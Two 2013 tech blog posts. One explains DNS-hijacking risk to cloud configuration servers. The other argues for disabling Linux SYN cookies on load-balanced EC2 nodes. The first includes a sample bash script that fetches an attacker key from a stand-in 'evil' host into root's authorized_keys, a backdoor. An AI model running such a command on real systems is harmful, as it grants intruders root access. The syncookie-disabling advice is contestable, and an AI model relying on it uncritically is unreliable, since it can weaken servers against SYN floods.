Monday, October 7, 2013

DNS hacking paranoia

Every time I see a story like this, I freak out a little:

http://thehackernews.com/2013/10/worlds-largest-web-hosting-company_5.html

Long story short: DNS hijacking.

When we look at the cloud offering landscape we see cloud providers like Amazon, RackSpace, and Google, but there are also cloud management companies like RightScale and Scalr.  These cloud management companies will sometimes layer in their own custom software bits that aid in the configuration and management of a given compute resource.

In most cases ( and we can even include things like chef servers here as well ) the compute resource that is being managed will make a call out to the "control server" for instructions.  But how does it know which server to contact?  That's where DNS comes in, for example:

configuration.us-east-1.mycompany.com

Would be a DNS entry that actually points to:

cf-chef-01.stackName0.deploymentName0.regionName.domainName.TLD

The DNS eventually points to an IP, and the client makes the call.
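Just to make it concrete, here's roughly what that chain looks like when you resolve it ( the names are the made-up ones from above, and the IP is invented ):

dig +short configuration.us-east-1.mycompany.com
cf-chef-01.stackName0.deploymentName0.regionName.domainName.TLD.
203.0.113.10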

If an attacker is able to hijack mycompany.com, they could point configuration.us-east-1 at their own IP address.  Most of these configuration management applications use some kind of authentication or validation to prove they are who they are.  In the case of chef, every request is signed with the client's key and validated on the server side, which makes "man in the middle" attacks much more difficult.
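For illustration, once the attacker controls the zone the hijack itself is just one record change.  A hypothetical BIND-style snippet ( the IP is made up ):

; attacker-controlled zone for mycompany.com
configuration.us-east-1    300    IN    A    203.0.113.66    ; attacker's box, not the real control server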

In some cases the configuration management software simply makes a call to a worker queue that uses a basic username/password system.  In that case one could wrap any generic worker queue with an "always pass authentication" switch so that every client successfully authenticates.  That would let you control the client simply by injecting worker elements into the queue.

For example, we could create a worker element that runs the following script as root:

#!/bin/bash
# grab the attacker's public key and append it to root's authorized_keys
curl -o /tmp/tmp.cache.r1234 http://my.evil.domain.com/public_key
cat /tmp/tmp.cache.r1234 >> /root/.ssh/authorized_keys

This would work great for any node that isn't in a VPC and is attached to a public IP.  Other trickery could be used to extend the evilness of this hack, but the point is that if you can execute something on the remote box as root, you're pretty well fucked.

This is why DNS hijacking stories scare me a little.

Friday, October 4, 2013

tcp syn flooding ... why does this keep happening?

Linux itself is just a kernel; all of the crap around the kernel, from bash to KDE, is considered part of the distro.  Linux distros come in many flavors, shapes and sizes.  This is beneficial to everyone as it allows for a few generic "types" of distros that can then specialize with further customizations.  For example, Ubuntu is derived from the Debian base type.  Similarly, CentOS is derived from Red Hat Enterprise Linux.

The differences between CentOS and RHEL are mostly related to licensing and support.  Red Hat the company publishes, maintains and supports the Red Hat Enterprise Linux ( RHEL ) distribution.  Their product isn't Linux itself; it's the support and maintenance of the distribution around Linux.  CentOS is not a product; it's maintained by the community according to their perfectly adequate community standards.

Amazon also makes its own AMI.  Their AMI is specifically designed to work in their EC2 environment.  The expectation is that this AMI will be used in a high-traffic environment.

When having a discussion about which distribution to go with, it's important to pay attention to the expectations of use.  These expectations aren't always as obvious as the expectations around the Amazon AMI.  Amazon is making its expectations very clear:

"the instance that you use with this AMI will take significant amounts of traffic from one or may sources"

This expectation is set by engineers who were paid large sums of money to ensure that it is reflected in every decision made by the maintainers of the Amazon AMI.  Amazon pinned their reputation on this AMI and they use it in their own production environments; that tells me quite a bit about what went into making this distro happen.  They also support it as part of an enterprise support contract.  All of these facts make the Amazon AMI a very solid choice for cloud operations.

Other distros, like CentOS, are far less clear about their expectations.  For instance, CentOS seems to live in many worlds with no clear, specific role or specialization.  However, certain choices made by the maintainers can give us a general idea of what the intent might be.

For example, if a distro made the choice to protect the system, by default, from a type of attack known as a "SYN flood", you would see the following:

cat /proc/sys/net/ipv4/tcp_syncookies
1

This means that tcp_syncookies is enabled.  It's a setting that says "if too many connection requests pile up at once, assume it's a SYN flood and start answering with SYN cookies instead of tracking each half-open connection normally."

This is great for a desktop, but it's exactly the opposite of what you want from a server in a high-volume environment.

It's a very easy fix, and in our case all I had to do was add a single line to the startup script for the service nodes.

          "echo 0 > /proc/sys/net/ipv4/tcp_syncookies\n",

Easy peasy.
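If you'd rather not lean on the startup script, the same change can be made persistent with sysctl.  A minimal sketch, assuming a stock /etc/sysctl.conf:

# apply it right now ( same effect as the echo above )
sysctl -w net.ipv4.tcp_syncookies=0

# and make it survive a reboot
echo "net.ipv4.tcp_syncookies = 0" >> /etc/sysctl.conf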

Here's what you would see in EC2 if you were using an ELB:

  1. Instances are fine, everything is in "In Service" state. 
  2. You run ab -n 10000 -c 500 http://your_host/hb
  3. About halfway through the test the ELB goes nuts and all of the instances flip to the "Out of Service" state.
  4. The application is fine and you can still ssh into the instance ( telnet to the port works too ), but from the load balancer's perspective the operating system looks completely offline.

What's happening is that the box is basically being DDoS'd by the haproxies that run as the ELB.  This type of mitigation is only useful on desktops, because in the cloud, or in any kind of professionally built data center environment, it's usually handled at other points upstream.
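If you want to confirm that SYN cookies are what's kicking in, the kernel usually leaves fingerprints.  A quick check, assuming a typical Linux box:

# the kernel logs a message when it starts sending cookies
dmesg | grep -i "syn flooding"

# and the protocol counters show how many cookies have been sent
netstat -s | grep -i "syn cookies"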

I remember writing about this many years ago while working at Deep Rock Drive; I'm just astonished that we still see this today in professional environments.